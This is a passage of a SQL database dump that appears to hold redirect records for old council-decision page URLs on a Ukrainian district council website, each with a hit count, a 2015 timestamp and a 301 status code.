00:00:00',301),(15691,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/472-pro-zatverdzhennja-programi-zajnjatosti-naselennja_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:29','0000-00-00 00:00:00',301),(15692,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/505-pro-spisannja-avtomobilja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:04:31','0000-00-00 00:00:00',301),(15693,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/506-pro-hid-vikonannja-rajonnoi-programi-prizovna_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:33','0000-00-00 00:00:00',301),(15694,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/507-pro-hid-vikonannja-rajonnoi-programi-turbota-na?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:04:34','0000-00-00 00:00:00',301),(15695,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/508-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:36','0000-00-00 00:00:00',301),(15696,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/509-pro-vnesennja-zmin-do-strukturi-vikonavchogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:37','0000-00-00 00:00:00',301),(15697,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/514-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:39','0000-00-00 00:00:00',301),(15698,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/515-pro-zatverdzhenja-aktu-prijomu-peredachi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:04:40','0000-00-00 00:00:00',301),(15699,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/518-pro-vnesennja-zmin-do-proektu-formuvannja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:42','0000-00-00 00:00:00',301),(15700,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/519-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:44','0000-00-00 00:00:00',301),(15701,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/58-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:49','0000-00-00 00:00:00',301),(15702,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/359-pro-hid-vikonannja-rajonnoi-programi-provedennja-u','','','',7,0,'2015-10-31 23:04:50','0000-00-00 00:00:00',301),(15703,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/360-pro-vnesennja-zmin-do-polozhennja-pro-postijni?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:52','0000-00-00 00:00:00',301),(15704,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/361-pro-prisvoennja-golovi-rajonnoi-radi-chergovogo','','','',7,0,'2015-10-31 23:04:53','0000-00-00 00:00:00',301),(15705,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/363-pro-vnesennja-zmin-do-programi-zajnjatosti?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:57','0000-00-00 00:00:00',301),(15706,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/365-pro-pereukladennja-kontraktiv-z-kerivnikami?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:58','0000-00-00 00:00:00',301),(15707,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/367-pro-peredachu-materialnih-cinnostej','','','',7,0,'2015-10-31 23:05:00','0000-00-00 00:00:00',301),(15708,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/370-pro-zatverdzhennja-spisku-prisjazhnih-malinskogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:02','0000-00-00 00:00:00',301),(15709,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/371-pro-priznachennja-kerivnika-komunalnogo_2','','','',80,0,'2015-10-31 23:05:05','0000-00-00 00:00:00',301),(15710,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/374-pro-vtratu-chinnosti-rishennja-rajonnoi-radi-5?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:06','0000-00-00 00:00:00',301),(15711,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/375-pro-pogodzhennja-priznachennja-na-posadu-direktora?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:08','0000-00-00 00:00:00',301),(15712,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/376-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi_2','','','',18,0,'2015-10-31 23:05:10','0000-00-00 00:00:00',301),(15713,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/379-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_9?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:05:14','0000-00-00 00:00:00',301),(15714,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/383-pro-zamishhennja-deputata-rajonnoi-radi_2','','','',10,0,'2015-10-31 23:05:15','0000-00-00 00:00:00',301),(15715,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/384-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:17','0000-00-00 00:00:00',301),(15716,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/392-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_15?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:05:19','0000-00-00 00:00:00',301),(15717,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/393-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_8','','','',12,0,'2015-10-31 23:05:21','0000-00-00 00:00:00',301),(15718,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/394-pro-deputatskij-zapit-deputata-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:23','0000-00-00 00:00:00',301),(15719,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/395-pro-zvernennja-do-nachalnika-sluzhbi-avtomobilnih','','','',44,0,'2015-10-31 23:05:27','0000-00-00 00:00:00',301),(15720,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/396-pro-pogodzhennja-priznachennja-na-posadu-direktora_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:30','0000-00-00 00:00:00',301),(15721,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/397-pro-skasuvannja-rishennja-rajonnoi-radi-vid-12?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:05:32','0000-00-00 00:00:00',301),(15722,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/399-pro-zatverdzhennja-zmin-do-strukturi-ta?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:38','0000-00-00 00:00:00',301),(15723,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/400-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_5?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:40','0000-00-00 00:00:00',301),(15724,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/734-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_18?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 23:05:45','0000-00-00 00:00:00',301),(15725,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/735-pro-skasuvannja-rishen-rajonnoi-radi-vid-25?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:48','0000-00-00 00:00:00',301),(15726,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/736-pro-zatverdzhennja-polozhennja-pro-konkursnij_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:05:50','0000-00-00 00:00:00',301),(15727,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/744-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_25?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:56','0000-00-00 00:00:00',301),(15728,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/749-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_19?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:05:58','0000-00-00 00:00:00',301),(15729,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/762-pro-peredachu-avtomobilja-gaz-3110?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 23:05:59','0000-00-00 00:00:00',301),(15730,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/767-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_6?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:06:01','0000-00-00 00:00:00',301),(15731,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/769-pro-zatverdzhennja-rozporjadzhennja-golovi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:05','0000-00-00 00:00:00',301),(15732,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/770-pro-zatverdzhennja-programi-ohoroni-ta?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:06','0000-00-00 00:00:00',301),(15733,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/773-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:08','0000-00-00 00:00:00',301),(15734,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/774-pro-nadannja-prava-malinskij-rajonnij-radi_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:09','0000-00-00 00:00:00',301),(15735,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/189-rishennja-prijnjati-na-pozachergovij-6-sesii?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:11','0000-00-00 00:00:00',301),(15736,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/191-pro-vnesennja-zmin-do-tipovogo-dogovoru-orendi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:13','0000-00-00 00:00:00',301),(15737,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/192-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:14','0000-00-00 00:00:00',301),(15738,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/195-pro-zatverdzhennja-tehnichnoi-dokumentacii-z?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:16','0000-00-00 00:00:00',301),(15739,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/196-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:17','0000-00-00 00:00:00',301),(15740,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/197-pro-nadannja-zgodi-komunalnomu-pidpriemstvu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:19','0000-00-00 00:00:00',301),(15741,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-?limitstart=0','','','',21,0,'2015-10-31 23:06:21','0000-00-00 00:00:00',301),(15742,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/102-pro-polozhennja-pro-postijni-komisii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:06:23','0000-00-00 00:00:00',301),(15743,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/103-pro-reglament-roboti-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:06:25','0000-00-00 00:00:00',301),(15744,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/104-pro-utvorennja-frakcij?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:06:27','0000-00-00 00:00:00',301),(15745,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/105-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2010?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:06:28','0000-00-00 00:00:00',301),(15746,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/111-pro-plan-roboti-rajonnoi-radi-na-i-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:06:30','0000-00-00 00:00:00',301),(15747,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/113-pro-rajonnu-programu-individualnogo-zhitlovogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:31','0000-00-00 00:00:00',301),(15748,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/116-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_3','','','',17,0,'2015-10-31 23:06:36','0000-00-00 00:00:00',301),(15749,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/161-pro-peredachu-chastini-primishhennja-vorsivskoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:37','0000-00-00 00:00:00',301),(15750,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/163-pro-normativnu-groshovu-ocinku-zemel-naselenih','','','',14,0,'2015-10-31 23:06:41','0000-00-00 00:00:00',301),(15751,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/164-pro-hid-vikonannja-rajonnoi-programi-pidtrimki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:43','0000-00-00 00:00:00',301),(15752,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/166-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_2','','','',10,0,'2015-10-31 23:06:48','0000-00-00 00:00:00',301),(15753,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/98-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_4','','','',52,0,'2015-10-31 23:06:50','0000-00-00 00:00:00',301),(15754,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/99-pro-utvorennja-prezidii-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:52','0000-00-00 00:00:00',301),(15755,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/292-pro-zatverdzhennja-regionalnoi-programi-rozvitku','','','',6,0,'2015-10-31 23:06:53','0000-00-00 00:00:00',301),(15756,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/293-pro-zamishhennja-deputata-rajonnoi-radi','','','',24,0,'2015-10-31 23:06:55','0000-00-00 00:00:00',301),(15757,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/296-pro-vnesennja-zmin-do-programi-socialno?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:06:58','0000-00-00 00:00:00',301),(15758,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/314-pro-inicijuvannja-peredachi-u-spilnu-vlasnist','','','',23,0,'2015-10-31 23:06:59','0000-00-00 00:00:00',301),(15759,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/315-pro-vnesennja-zmin-do-programi-vidpochinku-ta?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:07:01','0000-00-00 00:00:00',301),(15760,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/316-pro-zatverdzhennja-rajonnoi-programi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:03','0000-00-00 00:00:00',301),(15761,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/317-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:05','0000-00-00 00:00:00',301),(15762,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/318-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:07:06','0000-00-00 00:00:00',301),(15763,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/320-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:08','0000-00-00 00:00:00',301),(15764,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/321-pro-stan-vikonannja-dohidnoi-chastini-rajonnogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:07:09','0000-00-00 00:00:00',301),(15765,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/79-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_3','','','',12,0,'2015-10-31 23:07:11','0000-00-00 00:00:00',301),(15766,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/80-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:07:13','0000-00-00 00:00:00',301),(15767,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-/585-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:07:14','0000-00-00 00:00:00',301),(15768,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/530-pro-nadannja-dozvolu-na-rozroblennja-detalnogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:16','0000-00-00 00:00:00',301),(15769,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/531-pro-prisvoennja-zvannja-pochesnogo-gromadjanina_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:18','0000-00-00 00:00:00',301),(15770,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/532-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:07:20','0000-00-00 00:00:00',301),(15771,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/533-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:22','0000-00-00 00:00:00',301),(15772,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/534-pro-zvernennja-do-verhovnoi-radi-ukraini-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:23','0000-00-00 00:00:00',301),(15773,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/535-pro-hid-vikonannja-programi-reformuvannja-i?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:25','0000-00-00 00:00:00',301),(15774,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/541-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_12?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:29','0000-00-00 00:00:00',301),(15775,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/542-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_20?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:07:30','0000-00-00 00:00:00',301),(15776,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/543-pro-peredachu-traktora?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:32','0000-00-00 00:00:00',301),(15777,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/545-pro-vnesennja-zmin-do-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:35','0000-00-00 00:00:00',301),(15778,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/546-pro-zminu-nazvi-vorsivskoi-zosh-i-ii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:37','0000-00-00 00:00:00',301),(15779,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/551-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_10?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:39','0000-00-00 00:00:00',301),(15780,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/555-pro-vikonannja-rajonnogo-bjudzhetu-za-pershe?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:41','0000-00-00 00:00:00',301),(15781,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/556-pro-pereobrannja-golovi-postijnoi-komisii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:42','0000-00-00 00:00:00',301),(15782,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/560-pro-stan-cilovogo-vikoristannja-zemel?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:44','0000-00-00 00:00:00',301),(15783,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/571-pro-deputatskij-zapit-deputata-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:46','0000-00-00 00:00:00',301),(15784,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/572-pro-zatverdzhennja-proektu-zemleustroju-shhodo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:48','0000-00-00 00:00:00',301),(15785,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/573-pro-klopotannja-pered-departamentom-praci-ta?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:50','0000-00-00 00:00:00',301),(15786,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/574-pro-klopotannja-pered-zhitomirskoju-oblasnoju?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:52','0000-00-00 00:00:00',301),(15787,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/118-pro-pogodzhennja-proektiv-vstanovlennja-mezh','','','',19,0,'2015-10-31 23:07:53','0000-00-00 00:00:00',301),(15788,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/118-pro-pogodzhennja-proektiv-vstanovlennja-mezh?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:07:55','0000-00-00 00:00:00',301),(15789,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/119-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2012-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:07:57','0000-00-00 00:00:00',301),(15790,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/204-pro-zatverdzhennja-programi-zajnjatosti-naselennja','','','',14,0,'2015-10-31 23:07:58','0000-00-00 00:00:00',301),(15791,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/204-pro-zatverdzhennja-programi-zajnjatosti-naselennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:08:00','0000-00-00 00:00:00',301),(15792,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/205-pro-programu-zabezpechennja-deputatskoi-dijalnosti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:08:01','0000-00-00 00:00:00',301),(15793,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/208-pro-zatverdzhennja-polozhennja-pro-orendu-majna?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:07','0000-00-00 00:00:00',301),(15794,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/209-pro-zvit-kerivnikiv-komunalnih-pidpriemstv','','','',38,0,'2015-10-31 23:08:08','0000-00-00 00:00:00',301),(15795,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/210-pro-stan-vikonannja-rishennja-malinskoi-rajonnoi','','','',7,0,'2015-10-31 23:08:11','0000-00-00 00:00:00',301),(15796,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/216-pro-zminu-nazvi-navchalnih-zakladiv-rajonu','','','',36,0,'2015-10-31 23:08:13','0000-00-00 00:00:00',301),(15797,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/219-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:15','0000-00-00 00:00:00',301),(15798,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/222-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_6?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:16','0000-00-00 00:00:00',301),(15799,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/223-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_8?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:18','0000-00-00 00:00:00',301),(15800,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/224-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:08:20','0000-00-00 00:00:00',301),(15801,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/226-pro-zatverdzhennja-rajonnoi-programi-vidpochinku','','','',9,0,'2015-10-31 23:08:22','0000-00-00 00:00:00',301),(15802,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/227-pro-zatverdzhennja-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:23','0000-00-00 00:00:00',301),(15803,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/233-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_9?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:08:25','0000-00-00 00:00:00',301),(15804,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/234-pro-vnesennja-zmin-do-skladu-rajonnoi-profesijnoi','','','',10,0,'2015-10-31 23:08:27','0000-00-00 00:00:00',301),(15805,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/238-pro-prijnjattja-u-spilnu-vlasnist-teritorialnih?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:08:28','0000-00-00 00:00:00',301),(15806,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/239-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi','','','',6,0,'2015-10-31 23:08:30','0000-00-00 00:00:00',301),(15807,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/240-pro-programu-socialno-ekonomichnogo-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:08:32','0000-00-00 